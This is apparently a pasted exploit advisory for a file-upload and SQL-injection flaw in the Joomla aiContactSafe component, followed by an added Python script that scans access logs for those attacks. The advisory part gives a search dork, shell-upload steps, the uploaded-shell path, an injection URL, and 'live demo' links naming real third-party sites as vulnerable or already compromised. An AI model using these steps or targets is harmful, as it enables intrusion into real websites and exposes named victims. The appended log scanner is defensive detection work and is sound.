Joomla com_aicontactsafe Arbitrary File Upload / SQL injection

a guest Jul 20th, 2016 920 Never
######################
# Exploit Title : Joomla com_aicontactsafe Arbitrary File Upload / SQL injection Vulnerability
# Exploit Author : D.R.S Dz Team
# Dork : inurl:index.php?option=com_aicontactsafe
# Software link : http://www.algisinfo.com/en/download/category/1-free-extensions.html
# Vendor Homepage : http://www.algisinfo.com/
# Version : 2.0.20
# Tested on : [Windows]
# Skype : xbadgirl21
# Date : 2016/07/18
# Video Proof : https://youtu.be/PdDmThHGVz8
######################
# [+] FILE UPLOAD :
######################
######################
# [+] DESCRIPTION :
######################
# [+] aiContactSafe is an AJAX-driven component to place a contact form anywhere on your web page,
# [+] with any number of custom fields of different types, including attachments.
# [+] A shell upload and an SQLi have been detected in this component.
######################
# [+] PoC :
######################
# 1.- SELECT A WEBSITE FROM THE DORK ABOVE
# 2.- http://localhost/site/index.php?option=com_aicontactsafe
# 3.- Check whether this directory is accessible to you : media/aicontactsafe/attachments
# 4.- Just upload your shell, txt or image via the upload field
# 5.- Shell directory : media/aicontactsafe/attachments/[RANDOM_NUM]Evi!l.php or the extension uploaded
# Ex : http://malmoskyttegille.se/media/aicontactsafe/attachments/x_415.txt
######################
# [+] Live Demo :
######################
# http://malmoskyttegille.se/index.php?option=com_aicontactsafe
######################
# [+] SQL injection :
######################
# PoC :
# http://www.site.com/index.php?option=com_aicontactsafe&field=1
# Admin Panel :
# http://www.site.com/administrator
######################
# [+] Live Demo :
######################
# http://www.esbrasil.net/portal/index.php?option=com_aicontactsafe&field=1
# http://www.rustyspic-a-part.com/index.php?option=com_aicontactsafe&field=1
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

#  0day.today [2016-07-20]  #
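As an added defender-side example (not part of the advisory above and not code from the aiContactSafe project), the following Python script scans Apache combined-format access logs for the two indicators the advisory describes: an executable file requested from media/aicontactsafe/attachments/ (the file-upload PoC), and a non-numeric value in the field parameter of com_aicontactsafe (the SQL injection PoC). The log lines, client addresses and file names are constructed sample data; the EXEC_EXT list and the assumption that field is normally a plain integer are assumptions about a typical deployment, not facts from the advisory.

```python
"""Flag suspicious requests against the aiContactSafe component in Apache
combined-format access logs.  Two signals are checked:
  1. a request for an executable file (php, phtml, ...) inside
     media/aicontactsafe/attachments/, the attachment directory the advisory
     names as web-accessible;
  2. a request to option=com_aicontactsafe whose ``field`` parameter is not a
     plain integer (the parameter the advisory names as injectable).
All log lines below are constructed sample data, not real traffic.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log: host ident user [time] "METHOD target PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Extensions a typical Apache/PHP setup executes when requested (assumption).
EXEC_EXT = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")
ATTACH_DIR = "/media/aicontactsafe/attachments/"
INT_RE = re.compile(r"^\d+$")  # 'field' is assumed to be an integer id

def parse_line(line):
    """Return host/time/method/path/query/status for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "host": m.group("host"),
        "time": m.group("time"),
        "method": m.group("method"),
        "path": unquote(parts.path),
        "query": parse_qs(parts.query, keep_blank_values=True),
        "status": int(m.group("status")),
    }

def classify(entry):
    """Return the list of finding names for one parsed entry (empty if nothing suspicious)."""
    findings = []
    path = entry["path"].lower()
    # 1. executable file served out of the attachment directory
    if ATTACH_DIR in path and path.endswith(EXEC_EXT):
        findings.append("exec_file_in_attachments")
    # 2. non-numeric 'field' value sent to the vulnerable component
    if entry["query"].get("option") == ["com_aicontactsafe"]:
        for value in entry["query"].get("field", []):
            if not INT_RE.match(value.strip()):
                findings.append("non_numeric_field_param")
                break
    return findings

def scan(lines):
    """Return (host, time, path, findings) for every line that triggers at least one finding."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # unparseable line: skip rather than crash the whole scan
        findings = classify(entry)
        if findings:
            hits.append((entry["host"], entry["time"], entry["path"], findings))
    return hits

# Constructed sample log (documentation-range addresses, invented file names).
SAMPLE_LOG = [
    # benign: the contact form page itself
    '203.0.113.5 - - [18/Jul/2016:10:01:02 +0000] "GET /index.php?option=com_aicontactsafe HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # benign: a text attachment fetched back from the attachment directory
    '203.0.113.5 - - [18/Jul/2016:10:02:10 +0000] "GET /media/aicontactsafe/attachments/x_415.txt HTTP/1.1" 200 42 "-" "Mozilla/5.0"',
    # suspicious: a PHP file requested from the attachment directory
    '198.51.100.7 - - [18/Jul/2016:10:03:30 +0000] "GET /media/aicontactsafe/attachments/1234evil.php HTTP/1.1" 200 312 "-" "curl/7.47"',
    # benign: numeric field parameter
    '203.0.113.9 - - [18/Jul/2016:10:04:00 +0000] "GET /index.php?option=com_aicontactsafe&field=1 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"',
    # suspicious: non-numeric field value (a quote character appended)
    '198.51.100.7 - - [18/Jul/2016:10:05:12 +0000] "GET /index.php?option=com_aicontactsafe&field=1%27 HTTP/1.1" 500 0 "-" "python-requests/2.9"',
]

if __name__ == "__main__":
    for host, when, path, findings in scan(SAMPLE_LOG):
        print(f"{when} {host} {path} -> {', '.join(findings)}")
```

On a real server, replace SAMPLE_LOG with the lines of the access log; a hit on exec_file_in_attachments is a strong sign that a script was stored in the attachment directory and should be followed by checking that directory on disk and confirming that the web server is configured not to execute anything under media/.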